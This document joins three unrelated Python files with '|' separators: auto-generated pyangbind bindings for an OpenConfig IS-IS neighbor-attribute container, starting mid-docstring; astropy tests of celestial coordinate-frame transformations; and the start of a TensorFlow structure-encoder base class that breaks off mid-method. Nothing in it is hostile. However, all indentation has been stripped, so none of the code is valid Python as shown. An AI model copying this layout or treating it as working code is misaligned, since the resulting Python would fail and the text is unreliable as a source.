Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/isis_neighbor_attribute/state (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_state() directly.
YANG Description: This container describes IS neighbor attribute state.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """state must be of a type compatible with container""",
"defined-type": "container",
"generated-type": """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""",
}
)
self.__state = t
if hasattr(self, "_set"):
self._set()
def _unset_state(self):
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
def _get_neighbors(self):
"""
Getter method for neighbors, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/isis_neighbor_attribute/neighbors (container)
YANG Description: This container describes IS neighbors.
"""
return self.__neighbors
def _set_neighbors(self, v, load=False):
"""
Setter method for neighbors, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/isis_neighbor_attribute/neighbors (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_neighbors is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_neighbors() directly.
YANG Description: This container describes IS neighbors.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=neighbors.neighbors,
is_container="container",
yang_name="neighbors",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """neighbors must be of a type compatible with container""",
"defined-type": "container",
"generated-type": """YANGDynClass(base=neighbors.neighbors, is_container='container', yang_name="neighbors", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""",
}
)
self.__neighbors = t
if hasattr(self, "_set"):
self._set()
def _unset_neighbors(self):
self.__neighbors = YANGDynClass(
base=neighbors.neighbors,
is_container="container",
yang_name="neighbors",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
state = __builtin__.property(_get_state)
neighbors = __builtin__.property(_get_neighbors)
_pyangbind_elements = OrderedDict([("state", state), ("neighbors", neighbors)])
from . import state
from . import neighbors
class isis_neighbor_attribute(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/isis/levels/level/link-state-database/lsp/tlvs/tlv/isis-neighbor-attribute. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines list of ISIS topology neighbors
for extended ISIS LSP(multiple system IDs).
"""
__slots__ = ("_path_helper", "_extmethods", "__state", "__neighbors")
_yang_name = "isis-neighbor-attribute"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
self.__neighbors = YANGDynClass(
base=neighbors.neighbors,
is_container="container",
yang_name="neighbors",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"isis",
"levels",
"level",
"link-state-database",
"lsp",
"tlvs",
"tlv",
"isis-neighbor-attribute",
]
def _get_state(self):
"""
Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/isis_neighbor_attribute/state (container)
YANG Description: This container describes IS neighbor attribute state.
"""
return self.__state
def _set_state(self, v, load=False):
"""
Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/isis_neighbor_attribute/state (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_state() directly.
YANG Description: This container describes IS neighbor attribute state.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """state must be of a type compatible with container""",
"defined-type": "container",
"generated-type": """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""",
}
)
self.__state = t
if hasattr(self, "_set"):
self._set()
def _unset_state(self):
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
def _get_neighbors(self):
"""
Getter method for neighbors, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/isis_neighbor_attribute/neighbors (container)
YANG Description: This container describes IS neighbors.
"""
return self.__neighbors
def _set_neighbors(self, v, load=False):
"""
Setter method for neighbors, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/isis_neighbor_attribute/neighbors (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_neighbors is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_neighbors() directly.
YANG Description: This container describes IS neighbors.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=neighbors.neighbors,
is_container="container",
yang_name="neighbors",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """neighbors must be of a type compatible with container""",
"defined-type": "container",
"generated-type": """YANGDynClass(base=neighbors.neighbors, is_container='container', yang_name="neighbors", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""",
}
)
self.__neighbors = t
if hasattr(self, "_set"):
self._set()
def _unset_neighbors(self):
self.__neighbors = YANGDynClass(
base=neighbors.neighbors,
is_container="container",
yang_name="neighbors",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
state = __builtin__.property(_get_state)
neighbors = __builtin__.property(_get_neighbors)
_pyangbind_elements = OrderedDict([("state", state), ("neighbors", neighbors)])
|
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""Accuracy tests for GCRS coordinate transformations, primarily to/from AltAz.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import numpy as np
from ... import units as u
from ...tests.helper import (pytest, remote_data,
quantity_allclose as allclose,
assert_quantity_allclose as assert_allclose)
from ...time import Time
from .. import (EarthLocation, get_sun, ICRS, GCRS, CIRS, ITRS, AltAz,
PrecessedGeocentric, CartesianRepresentation, SkyCoord,
SphericalRepresentation, UnitSphericalRepresentation,
HCRS, HeliocentricTrueEcliptic)
from ..._erfa import epv00
from .utils import randomly_sample_sphere
from ..builtin_frames.utils import get_jd12
from .. import solar_system_ephemeris
try:
import jplephem # pylint: disable=W0611
except ImportError:
HAS_JPLEPHEM = False
else:
HAS_JPLEPHEM = True
def test_icrs_cirs():
"""
Check a few cases of ICRS<->CIRS for consistency.
Also includes the CIRS<->CIRS transforms at different times, as those go
through ICRS
"""
ra, dec, dist = randomly_sample_sphere(200)
inod = ICRS(ra=ra, dec=dec)
iwd = ICRS(ra=ra, dec=dec, distance=dist*u.pc)
cframe1 = CIRS()
cirsnod = inod.transform_to(cframe1) # uses the default time
# first do a round-tripping test
inod2 = cirsnod.transform_to(ICRS)
assert_allclose(inod.ra, inod2.ra)
assert_allclose(inod.dec, inod2.dec)
# now check that a different time yields different answers
cframe2 = CIRS(obstime=Time('J2005', scale='utc'))
cirsnod2 = inod.transform_to(cframe2)
assert not allclose(cirsnod.ra, cirsnod2.ra, rtol=1e-8)
assert not allclose(cirsnod.dec, cirsnod2.dec, rtol=1e-8)
# parallax effects should be included, so with and w/o distance should be different
cirswd = iwd.transform_to(cframe1)
assert not allclose(cirswd.ra, cirsnod.ra, rtol=1e-8)
assert not allclose(cirswd.dec, cirsnod.dec, rtol=1e-8)
# and the distance should transform at least somehow
assert not allclose(cirswd.distance, iwd.distance, rtol=1e-8)
# now check that the cirs self-transform works as expected
cirsnod3 = cirsnod.transform_to(cframe1) # should be a no-op
assert_allclose(cirsnod.ra, cirsnod3.ra)
assert_allclose(cirsnod.dec, cirsnod3.dec)
cirsnod4 = cirsnod.transform_to(cframe2) # should be different
assert not allclose(cirsnod4.ra, cirsnod.ra, rtol=1e-8)
assert not allclose(cirsnod4.dec, cirsnod.dec, rtol=1e-8)
cirsnod5 = cirsnod4.transform_to(cframe1) # should be back to the same
assert_allclose(cirsnod.ra, cirsnod5.ra)
assert_allclose(cirsnod.dec, cirsnod5.dec)
ra, dec, dist = randomly_sample_sphere(200)
icrs_coords = [ICRS(ra=ra, dec=dec), ICRS(ra=ra, dec=dec, distance=dist*u.pc)]
gcrs_frames = [GCRS(), GCRS(obstime=Time('J2005', scale='utc'))]
@pytest.mark.parametrize('icoo', icrs_coords)
def test_icrs_gcrs(icoo):
"""
Check ICRS<->GCRS for consistency
"""
gcrscoo = icoo.transform_to(gcrs_frames[0]) # uses the default time
# first do a round-tripping test
icoo2 = gcrscoo.transform_to(ICRS)
assert_allclose(icoo.distance, icoo2.distance)
assert_allclose(icoo.ra, icoo2.ra)
assert_allclose(icoo.dec, icoo2.dec)
assert isinstance(icoo2.data, icoo.data.__class__)
# now check that a different time yields different answers
gcrscoo2 = icoo.transform_to(gcrs_frames[1])
assert not allclose(gcrscoo.ra, gcrscoo2.ra, rtol=1e-8, atol=1e-10*u.deg)
assert not allclose(gcrscoo.dec, gcrscoo2.dec, rtol=1e-8, atol=1e-10*u.deg)
    # now check that the gcrs self-transform works as expected
gcrscoo3 = gcrscoo.transform_to(gcrs_frames[0]) # should be a no-op
assert_allclose(gcrscoo.ra, gcrscoo3.ra)
assert_allclose(gcrscoo.dec, gcrscoo3.dec)
gcrscoo4 = gcrscoo.transform_to(gcrs_frames[1]) # should be different
assert not allclose(gcrscoo4.ra, gcrscoo.ra, rtol=1e-8, atol=1e-10*u.deg)
assert not allclose(gcrscoo4.dec, gcrscoo.dec, rtol=1e-8, atol=1e-10*u.deg)
gcrscoo5 = gcrscoo4.transform_to(gcrs_frames[0]) # should be back to the same
assert_allclose(gcrscoo.ra, gcrscoo5.ra, rtol=1e-8, atol=1e-10*u.deg)
assert_allclose(gcrscoo.dec, gcrscoo5.dec, rtol=1e-8, atol=1e-10*u.deg)
# also make sure that a GCRS with a different geoloc/geovel gets a different answer
# roughly a moon-like frame
gframe3 = GCRS(obsgeoloc=[385000., 0, 0]*u.km, obsgeovel=[1, 0, 0]*u.km/u.s)
gcrscoo6 = icoo.transform_to(gframe3) # should be different
assert not allclose(gcrscoo.ra, gcrscoo6.ra, rtol=1e-8, atol=1e-10*u.deg)
assert not allclose(gcrscoo.dec, gcrscoo6.dec, rtol=1e-8, atol=1e-10*u.deg)
icooviag3 = gcrscoo6.transform_to(ICRS) # and now back to the original
assert_allclose(icoo.ra, icooviag3.ra)
assert_allclose(icoo.dec, icooviag3.dec)
@pytest.mark.parametrize('gframe', gcrs_frames)
def test_icrs_gcrs_dist_diff(gframe):
"""
Check that with and without distance give different ICRS<->GCRS answers
"""
gcrsnod = icrs_coords[0].transform_to(gframe)
gcrswd = icrs_coords[1].transform_to(gframe)
# parallax effects should be included, so with and w/o distance should be different
assert not allclose(gcrswd.ra, gcrsnod.ra, rtol=1e-8, atol=1e-10*u.deg)
assert not allclose(gcrswd.dec, gcrsnod.dec, rtol=1e-8, atol=1e-10*u.deg)
# and the distance should transform at least somehow
assert not allclose(gcrswd.distance, icrs_coords[1].distance, rtol=1e-8,
atol=1e-10*u.pc)
def test_cirs_to_altaz():
"""
Check the basic CIRS<->AltAz transforms. More thorough checks implicitly
happen in `test_iau_fullstack`
"""
from .. import EarthLocation
ra, dec, dist = randomly_sample_sphere(200)
cirs = CIRS(ra=ra, dec=dec, obstime='J2000')
crepr = SphericalRepresentation(lon=ra, lat=dec, distance=dist)
cirscart = CIRS(crepr, obstime=cirs.obstime, representation=CartesianRepresentation)
loc = EarthLocation(lat=0*u.deg, lon=0*u.deg, height=0*u.m)
altazframe = AltAz(location=loc, obstime=Time('J2005'))
cirs2 = cirs.transform_to(altazframe).transform_to(cirs)
cirs3 = cirscart.transform_to(altazframe).transform_to(cirs)
# check round-tripping
assert_allclose(cirs.ra, cirs2.ra)
assert_allclose(cirs.dec, cirs2.dec)
assert_allclose(cirs.ra, cirs3.ra)
assert_allclose(cirs.dec, cirs3.dec)
def test_gcrs_itrs():
"""
Check basic GCRS<->ITRS transforms for round-tripping.
"""
ra, dec, _ = randomly_sample_sphere(200)
gcrs = GCRS(ra=ra, dec=dec, obstime='J2000')
gcrs6 = GCRS(ra=ra, dec=dec, obstime='J2006')
gcrs2 = gcrs.transform_to(ITRS).transform_to(gcrs)
gcrs6_2 = gcrs6.transform_to(ITRS).transform_to(gcrs)
assert_allclose(gcrs.ra, gcrs2.ra)
assert_allclose(gcrs.dec, gcrs2.dec)
assert not allclose(gcrs.ra, gcrs6_2.ra)
assert not allclose(gcrs.dec, gcrs6_2.dec)
# also try with the cartesian representation
gcrsc = gcrs.realize_frame(gcrs.data)
gcrsc.representation = CartesianRepresentation
gcrsc2 = gcrsc.transform_to(ITRS).transform_to(gcrsc)
assert_allclose(gcrsc.spherical.lon.deg, gcrsc2.ra.deg)
assert_allclose(gcrsc.spherical.lat, gcrsc2.dec)
def test_cirs_itrs():
"""
Check basic CIRS<->ITRS transforms for round-tripping.
"""
ra, dec, _ = randomly_sample_sphere(200)
cirs = CIRS(ra=ra, dec=dec, obstime='J2000')
cirs6 = CIRS(ra=ra, dec=dec, obstime='J2006')
cirs2 = cirs.transform_to(ITRS).transform_to(cirs)
cirs6_2 = cirs6.transform_to(ITRS).transform_to(cirs) # different obstime
# just check round-tripping
assert_allclose(cirs.ra, cirs2.ra)
assert_allclose(cirs.dec, cirs2.dec)
assert not allclose(cirs.ra, cirs6_2.ra)
assert not allclose(cirs.dec, cirs6_2.dec)
def test_gcrs_cirs():
"""
Check GCRS<->CIRS transforms for round-tripping. More complicated than the
above two because it's multi-hop
"""
ra, dec, _ = randomly_sample_sphere(200)
gcrs = GCRS(ra=ra, dec=dec, obstime='J2000')
gcrs6 = GCRS(ra=ra, dec=dec, obstime='J2006')
gcrs2 = gcrs.transform_to(CIRS).transform_to(gcrs)
gcrs6_2 = gcrs6.transform_to(CIRS).transform_to(gcrs)
assert_allclose(gcrs.ra, gcrs2.ra)
assert_allclose(gcrs.dec, gcrs2.dec)
assert not allclose(gcrs.ra, gcrs6_2.ra)
assert not allclose(gcrs.dec, gcrs6_2.dec)
# now try explicit intermediate pathways and ensure they're all consistent
gcrs3 = gcrs.transform_to(ITRS).transform_to(CIRS).transform_to(ITRS).transform_to(gcrs)
assert_allclose(gcrs.ra, gcrs3.ra)
assert_allclose(gcrs.dec, gcrs3.dec)
gcrs4 = gcrs.transform_to(ICRS).transform_to(CIRS).transform_to(ICRS).transform_to(gcrs)
assert_allclose(gcrs.ra, gcrs4.ra)
assert_allclose(gcrs.dec, gcrs4.dec)
def test_gcrs_altaz():
"""
Check GCRS<->AltAz transforms for round-tripping. Has multiple paths
"""
from .. import EarthLocation
ra, dec, _ = randomly_sample_sphere(1)
gcrs = GCRS(ra=ra[0], dec=dec[0], obstime='J2000')
    # check with an array of obstimes to make sure N-d arrays work
times = Time(np.linspace(2456293.25, 2456657.25, 51) * u.day,
format='jd', scale='utc')
loc = EarthLocation(lon=10 * u.deg, lat=80. * u.deg)
aaframe = AltAz(obstime=times, location=loc)
aa1 = gcrs.transform_to(aaframe)
aa2 = gcrs.transform_to(ICRS).transform_to(CIRS).transform_to(aaframe)
aa3 = gcrs.transform_to(ITRS).transform_to(CIRS).transform_to(aaframe)
# make sure they're all consistent
assert_allclose(aa1.alt, aa2.alt)
assert_allclose(aa1.az, aa2.az)
assert_allclose(aa1.alt, aa3.alt)
assert_allclose(aa1.az, aa3.az)
def test_precessed_geocentric():
assert PrecessedGeocentric().equinox.jd == Time('J2000', scale='utc').jd
gcrs_coo = GCRS(180*u.deg, 2*u.deg, distance=10000*u.km)
pgeo_coo = gcrs_coo.transform_to(PrecessedGeocentric)
assert np.abs(gcrs_coo.ra - pgeo_coo.ra) > 10*u.marcsec
assert np.abs(gcrs_coo.dec - pgeo_coo.dec) > 10*u.marcsec
assert_allclose(gcrs_coo.distance, pgeo_coo.distance)
gcrs_roundtrip = pgeo_coo.transform_to(GCRS)
assert_allclose(gcrs_coo.ra, gcrs_roundtrip.ra)
assert_allclose(gcrs_coo.dec, gcrs_roundtrip.dec)
assert_allclose(gcrs_coo.distance, gcrs_roundtrip.distance)
pgeo_coo2 = gcrs_coo.transform_to(PrecessedGeocentric(equinox='B1850'))
assert np.abs(gcrs_coo.ra - pgeo_coo2.ra) > 1.5*u.deg
assert np.abs(gcrs_coo.dec - pgeo_coo2.dec) > 0.5*u.deg
assert_allclose(gcrs_coo.distance, pgeo_coo2.distance)
gcrs2_roundtrip = pgeo_coo2.transform_to(GCRS)
assert_allclose(gcrs_coo.ra, gcrs2_roundtrip.ra)
assert_allclose(gcrs_coo.dec, gcrs2_roundtrip.dec)
assert_allclose(gcrs_coo.distance, gcrs2_roundtrip.distance)
# shared by parametrized tests below. Some use the whole AltAz, others use just obstime
totest_frames = [AltAz(location=EarthLocation(-90*u.deg, 65*u.deg),
obstime=Time('J2000')), # J2000 is often a default so this might work when others don't
AltAz(location=EarthLocation(120*u.deg, -35*u.deg),
obstime=Time('J2000')),
AltAz(location=EarthLocation(-90*u.deg, 65*u.deg),
obstime=Time('2014-01-01 00:00:00')),
AltAz(location=EarthLocation(-90*u.deg, 65*u.deg),
obstime=Time('2014-08-01 08:00:00')),
AltAz(location=EarthLocation(120*u.deg, -35*u.deg),
obstime=Time('2014-01-01 00:00:00'))
]
MOONDIST = 385000*u.km # approximate semi-major axis of the Moon's orbit
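# a Cartesian point at lunar distance along the (1, 1, 1) direction, so that
# the norm of MOONDIST_CART equals MOONDIST (descriptive note added for clarity)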
MOONDIST_CART = CartesianRepresentation(3**-0.5*MOONDIST, 3**-0.5*MOONDIST, 3**-0.5*MOONDIST)
EARTHECC = 0.017 + 0.005 # roughly earth orbital eccentricity, but with an added tolerance
@pytest.mark.parametrize('testframe', totest_frames)
def test_gcrs_altaz_sunish(testframe):
"""
Sanity-check that the sun is at a reasonable distance from any altaz
"""
sun = get_sun(testframe.obstime)
assert sun.frame.name == 'gcrs'
# the .to(u.au) is not necessary, it just makes the asserts on failure more readable
assert (EARTHECC - 1)*u.au < sun.distance.to(u.au) < (EARTHECC + 1)*u.au
sunaa = sun.transform_to(testframe)
assert (EARTHECC - 1)*u.au < sunaa.distance.to(u.au) < (EARTHECC + 1)*u.au
@pytest.mark.parametrize('testframe', totest_frames)
def test_gcrs_altaz_moonish(testframe):
"""
Sanity-check that an object resembling the moon goes to the right place with
a GCRS->AltAz transformation
"""
moon = GCRS(MOONDIST_CART, obstime=testframe.obstime)
moonaa = moon.transform_to(testframe)
# now check that the distance change is similar to earth radius
assert 1000*u.km < np.abs(moonaa.distance - moon.distance).to(u.km) < 7000*u.km
# now check that it round-trips
moon2 = moonaa.transform_to(moon)
assert_allclose(moon.cartesian.xyz, moon2.cartesian.xyz)
# also should add checks that the alt/az are different for different earth locations
@pytest.mark.parametrize('testframe', totest_frames)
def test_gcrs_altaz_bothroutes(testframe):
"""
Repeat of both the moonish and sunish tests above to make sure the two
routes through the coordinate graph are consistent with each other
"""
sun = get_sun(testframe.obstime)
sunaa_viaicrs = sun.transform_to(ICRS).transform_to(testframe)
sunaa_viaitrs = sun.transform_to(ITRS(obstime=testframe.obstime)).transform_to(testframe)
moon = GCRS(MOONDIST_CART, obstime=testframe.obstime)
moonaa_viaicrs = moon.transform_to(ICRS).transform_to(testframe)
moonaa_viaitrs = moon.transform_to(ITRS(obstime=testframe.obstime)).transform_to(testframe)
assert_allclose(sunaa_viaicrs.cartesian.xyz, sunaa_viaitrs.cartesian.xyz)
assert_allclose(moonaa_viaicrs.cartesian.xyz, moonaa_viaitrs.cartesian.xyz)
@pytest.mark.parametrize('testframe', totest_frames)
def test_cirs_altaz_moonish(testframe):
"""
Sanity-check that an object resembling the moon goes to the right place with
a CIRS<->AltAz transformation
"""
moon = CIRS(MOONDIST_CART, obstime=testframe.obstime)
moonaa = moon.transform_to(testframe)
assert 1000*u.km < np.abs(moonaa.distance - moon.distance).to(u.km) < 7000*u.km
# now check that it round-trips
moon2 = moonaa.transform_to(moon)
assert_allclose(moon.cartesian.xyz, moon2.cartesian.xyz)
@pytest.mark.parametrize('testframe', totest_frames)
def test_cirs_altaz_nodist(testframe):
"""
Check that a UnitSphericalRepresentation coordinate round-trips for the
CIRS<->AltAz transformation.
"""
coo0 = CIRS(UnitSphericalRepresentation(10*u.deg, 20*u.deg), obstime=testframe.obstime)
# check that it round-trips
coo1 = coo0.transform_to(testframe).transform_to(coo0)
assert_allclose(coo0.cartesian.xyz, coo1.cartesian.xyz)
@pytest.mark.parametrize('testframe', totest_frames)
def test_cirs_icrs_moonish(testframe):
"""
check that something like the moon goes to about the right distance from the
ICRS origin when starting from CIRS
"""
moonish = CIRS(MOONDIST_CART, obstime=testframe.obstime)
moonicrs = moonish.transform_to(ICRS)
assert 0.97*u.au < moonicrs.distance < 1.03*u.au
@pytest.mark.parametrize('testframe', totest_frames)
def test_gcrs_icrs_moonish(testframe):
"""
check that something like the moon goes to about the right distance from the
ICRS origin when starting from GCRS
"""
moonish = GCRS(MOONDIST_CART, obstime=testframe.obstime)
moonicrs = moonish.transform_to(ICRS)
assert 0.97*u.au < moonicrs.distance < 1.03*u.au
@pytest.mark.parametrize('testframe', totest_frames)
def test_icrs_gcrscirs_sunish(testframe):
"""
check that the ICRS barycenter goes to about the right distance from various
~geocentric frames (other than testframe)
"""
# slight offset to avoid divide-by-zero errors
icrs = ICRS(0*u.deg, 0*u.deg, distance=10*u.km)
gcrs = icrs.transform_to(GCRS(obstime=testframe.obstime))
assert (EARTHECC - 1)*u.au < gcrs.distance.to(u.au) < (EARTHECC + 1)*u.au
cirs = icrs.transform_to(CIRS(obstime=testframe.obstime))
assert (EARTHECC - 1)*u.au < cirs.distance.to(u.au) < (EARTHECC + 1)*u.au
itrs = icrs.transform_to(ITRS(obstime=testframe.obstime))
assert (EARTHECC - 1)*u.au < itrs.spherical.distance.to(u.au) < (EARTHECC + 1)*u.au
@pytest.mark.parametrize('testframe', totest_frames)
def test_icrs_altaz_moonish(testframe):
"""
Check that something expressed in *ICRS* as being moon-like goes to the
right AltAz distance
"""
# we use epv00 instead of get_sun because get_sun includes aberration
earth_pv_helio, earth_pv_bary = epv00(*get_jd12(testframe.obstime, 'tdb'))
earth_icrs_xyz = earth_pv_bary[0]*u.au
moonoffset = [0, 0, MOONDIST.value]*MOONDIST.unit
moonish_icrs = ICRS(CartesianRepresentation(earth_icrs_xyz + moonoffset))
moonaa = moonish_icrs.transform_to(testframe)
# now check that the distance change is similar to earth radius
assert 1000*u.km < np.abs(moonaa.distance - MOONDIST).to(u.km) < 7000*u.km
def test_gcrs_self_transform_closeby():
"""
Tests GCRS self transform for objects which are nearby and thus
have reasonable parallax.
Moon positions were originally created using JPL DE432s ephemeris.
The two lunar positions (one geocentric, one at a defined location)
are created via a transformation from ICRS to two different GCRS frames.
We test that the GCRS-GCRS self transform can correctly map one GCRS
frame onto the other.
"""
t = Time("2014-12-25T07:00")
moon_geocentric = SkyCoord(GCRS(318.10579159*u.deg,
-11.65281165*u.deg,
365042.64880308*u.km, obstime=t))
# this is the location of the Moon as seen from La Palma
obsgeoloc = [-5592982.59658935, -63054.1948592, 3059763.90102216]*u.m
obsgeovel = [4.59798494, -407.84677071, 0.]*u.m/u.s
moon_lapalma = SkyCoord(GCRS(318.7048445*u.deg,
-11.98761996*u.deg,
369722.8231031*u.km,
obstime=t,
obsgeoloc=obsgeoloc,
obsgeovel=obsgeovel))
transformed = moon_geocentric.transform_to(moon_lapalma.frame)
delta = transformed.separation_3d(moon_lapalma)
assert_allclose(delta, 0.0*u.m, atol=1*u.m)
@remote_data
@pytest.mark.skipif('not HAS_JPLEPHEM')
def test_ephemerides():
"""
We test that using different ephemerides gives very similar results
for transformations
"""
t = Time("2014-12-25T07:00")
moon = SkyCoord(GCRS(318.10579159*u.deg,
-11.65281165*u.deg,
365042.64880308*u.km, obstime=t))
icrs_frame = ICRS()
hcrs_frame = HCRS(obstime=t)
ecl_frame = HeliocentricTrueEcliptic(equinox=t)
cirs_frame = CIRS(obstime=t)
moon_icrs_builtin = moon.transform_to(icrs_frame)
moon_hcrs_builtin = moon.transform_to(hcrs_frame)
moon_helioecl_builtin = moon.transform_to(ecl_frame)
moon_cirs_builtin = moon.transform_to(cirs_frame)
with solar_system_ephemeris.set('jpl'):
moon_icrs_jpl = moon.transform_to(icrs_frame)
moon_hcrs_jpl = moon.transform_to(hcrs_frame)
moon_helioecl_jpl = moon.transform_to(ecl_frame)
moon_cirs_jpl = moon.transform_to(cirs_frame)
# most transformations should differ by an amount which is
# non-zero but of order milliarcsecs
sep_icrs = moon_icrs_builtin.separation(moon_icrs_jpl)
sep_hcrs = moon_hcrs_builtin.separation(moon_hcrs_jpl)
sep_helioecl = moon_helioecl_builtin.separation(moon_helioecl_jpl)
sep_cirs = moon_cirs_builtin.separation(moon_cirs_jpl)
assert_allclose([sep_icrs, sep_hcrs, sep_helioecl], 0.0*u.deg, atol=10*u.mas)
assert all(sep > 10*u.microarcsecond for sep in (sep_icrs, sep_hcrs, sep_helioecl))
# CIRS should be the same
assert_allclose(sep_cirs, 0.0*u.deg, atol=1*u.microarcsecond)
|
|
from abc import ABCMeta, abstractmethod
import tensorflow as tf
import prettytensor as pt
import zutils.tf_math_funcs as tmf
import zutils.pt_utils as ptu
import net_modules.auto_struct.utils as asu
from net_modules import keypoints_2d
import math
from zutils.py_utils import *
import zutils.tf_graph_utils as tgu
import collections
class Factory:
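"""Abstract base for structure encoders (summary inferred from the code below).

Subclasses supply `image2heatmap` and `heatmap2structure`; this base class wires
them into the pipeline image -> shared feature -> heatmap -> structure
parameters -> flattened latent vector, which `__call__` returns together with
the extra outputs collected by the ModuleOutputStrip.
"""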
__metaclass__ = ABCMeta
def __init__(self, output_channels, options):
"""
:param output_channels: output_channels for the encoding net
"""
self.output_channels = output_channels
self.options = options
self.structure_as_final_class = True
self.target_input_size = None
self.stop_gradient_at_latent_for_structure = False
def __call__(self, input_tensor, condition_tensor=None, extra_inputs=None):
_, _, structure_latent, mos = self.structure_encode(
input_tensor, condition_tensor=condition_tensor, extra_inputs=extra_inputs)
latent_tensor = structure_latent
assert self.output_channels == tmf.get_shape(latent_tensor)[1], \
"wrong output_channels"
return structure_latent, mos.extra_outputs
def input_to_heatmap_overall(self, input_tensor, mos):
# compute shared features
overall_feature = mos(self.image2sharedfeature(input_tensor))
# compute raw heatmap
raw_heatmap = mos(self.image2heatmap(overall_feature))
if "heatmap_extra" in mos.extra_outputs:
